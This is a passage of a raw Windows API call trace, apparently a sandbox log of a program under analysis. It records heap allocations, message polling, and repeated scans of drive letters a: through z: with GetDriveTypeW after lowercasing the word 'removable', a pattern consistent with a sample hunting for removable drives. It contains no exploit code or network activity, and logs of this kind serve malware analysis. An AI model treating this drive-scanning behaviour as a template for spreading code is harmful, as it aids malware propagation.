dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0213.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0213.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0213.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0213.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0213.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.258] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.258] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0213.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0213.258] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.258] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0213.258] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0213.259] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0213.259] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0213.259] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0213.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0213.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0213.259] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0213.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0213.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0213.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0213.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0213.259] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0213.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0213.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0213.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0213.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0213.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0213.259] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0213.259] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0213.260] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0213.260] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0213.260] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0213.260] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0213.260] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0213.260] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0213.261] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0213.261] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0213.261] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0213.261] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0213.261] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0213.262] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0213.262] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0213.262] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0213.262] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0213.262] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0213.262] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0213.263] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0213.263] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0213.263] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0213.263] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0213.263] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0213.263] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0213.263] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0213.264] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0213.368] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0213.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0213.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0213.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0213.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0213.369] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0213.369] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0213.369] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0213.369] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0213.369] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0213.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.369] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.369] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0213.369] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0213.369] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0213.369] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0213.369] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0213.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0213.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0213.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0213.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0213.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0213.370] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0213.370] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0213.370] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0213.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0213.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0213.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0213.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0213.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0213.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0213.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.370] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.370] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0213.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0213.387] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.387] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0213.387] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0213.387] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0213.387] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0213.387] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0213.387] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2b0 [0213.387] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318cc0 [0213.387] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.387] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0213.387] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0213.387] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0213.387] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0213.387] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0213.387] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0213.387] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0213.388] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0213.388] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0213.388] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0213.388] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0213.388] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0213.388] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0213.388] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0213.388] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0213.388] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0213.388] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0213.389] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0213.389] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0213.389] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0213.389] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0213.389] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0213.390] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0213.390] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0213.390] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0213.390] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0213.391] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0213.391] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0213.391] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0213.391] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0213.391] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0213.392] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0213.392] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0213.392] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0213.392] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0213.392] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0213.393] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0213.393] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0213.393] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0213.393] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0213.393] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0213.393] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.393] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0213.393] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0213.393] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0213.393] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0213.393] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0213.393] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0213.393] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0213.393] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0213.394] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.394] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0213.394] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0213.394] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0213.394] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e20 [0213.394] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.394] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0213.394] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0213.394] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.394] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e20 | out: hHeap=0x12c0000) returned 1 [0213.394] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0213.394] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0213.394] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0213.394] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.394] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0213.394] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.394] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318cc0 | out: hHeap=0x12c0000) returned 1 [0213.394] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.395] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0213.395] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0213.395] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.395] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0213.395] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0213.395] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0213.395] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0213.395] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.395] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0213.395] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0213.395] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.395] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0213.395] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0213.395] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0213.395] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0213.395] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0213.395] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0213.395] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0213.395] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.395] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0213.395] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0213.395] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0213.395] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0213.395] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.396] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0213.396] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0213.396] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0213.396] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0213.396] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0213.396] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0213.396] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0213.396] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0213.397] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0213.397] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0213.397] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0213.397] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0213.398] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0213.398] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0213.398] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0213.398] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0213.398] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0213.398] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0213.399] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0213.399] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0213.399] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0213.399] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0213.399] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0213.400] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0213.400] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0213.400] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0213.400] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0213.400] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0213.401] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0213.401] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0213.401] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0213.401] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0213.401] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0213.401] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0213.402] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0213.402] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.402] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0213.402] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.402] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0213.402] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0213.402] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.402] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0213.402] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0213.402] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0213.402] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.402] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.402] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0213.402] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0213.402] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0213.402] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260e0 [0213.402] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0213.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0213.402] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0213.402] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0213.402] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260e0 | out: hHeap=0x12c0000) returned 1 [0213.403] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0213.403] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0213.403] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0213.403] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.403] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0213.403] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 